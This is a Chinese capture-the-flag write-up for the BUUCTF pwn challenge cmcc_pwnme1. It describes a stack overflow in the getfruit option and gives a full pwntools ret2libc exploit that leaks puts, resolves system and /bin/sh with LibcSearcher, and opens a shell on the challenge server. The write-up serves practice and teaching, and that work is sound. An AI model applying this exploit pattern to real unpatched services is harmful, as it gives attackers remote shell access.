[BUUCTF-pwn]——cmcc_pwnme1

• 題目地址：https://buuoj.cn/challenges#cmcc_pwnme1

先checksec一下,什么保護(hù)都沒(méi)有開(kāi),嘶

在IDA中

看完之后,相信大家和我一樣.就這???
思路很清晰, 選擇5,進(jìn)入getfruit,利用棧溢出.修改返回地址為 getflag
結(jié)果, 沒(méi)有這個(gè)文件, 搞笑呀

不過(guò)可以棧溢出, 我們可以利用ret2libc來(lái)解決

思路

通過(guò)棧溢出,循環(huán)調(diào)用.
第一次利用棧溢出leek出地址, 找到libc計(jì)算偏移找到system和binsh
第二次利用棧溢出進(jìn)行執(zhí)行

exploi

from pwn import * from LibcSearcher import * p = remote('node3.buuoj.cn',27311) elf = ELF('./pwnme1') #context.log_level = 'debug' puts_plt = elf.plt['puts'] puts_got = elf.got['puts'] main = elf.symbols['main'] p.sendline('5')payload = 'a' * 0xa4 + 'aaaa' + p32(puts_plt) + p32(main) + p32(puts_got) p.sendlineafter('Please input the name of fruit:',payload) puts_addr = u32(p.recvuntil('\xf7')[-4:]) log.success("puts_addr ---->>" + hex(puts_addr))libc = LibcSearcher('puts', puts_addr) libc_base = puts_addr - libc.dump('puts') sys = libc_base + libc.dump('system')binsh = libc_base + libc.dump('str_bin_sh') p.sendline('5') payload = 'a' *0xa8 + p32(sys) + 'junk' + p32(binsh) p.sendlineafter('Please input the name of fruit:',payload) p.interactive()

總結(jié)

以上是生活随笔為你收集整理的[BUUCTF-pwn]——cmcc_pwnme1的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。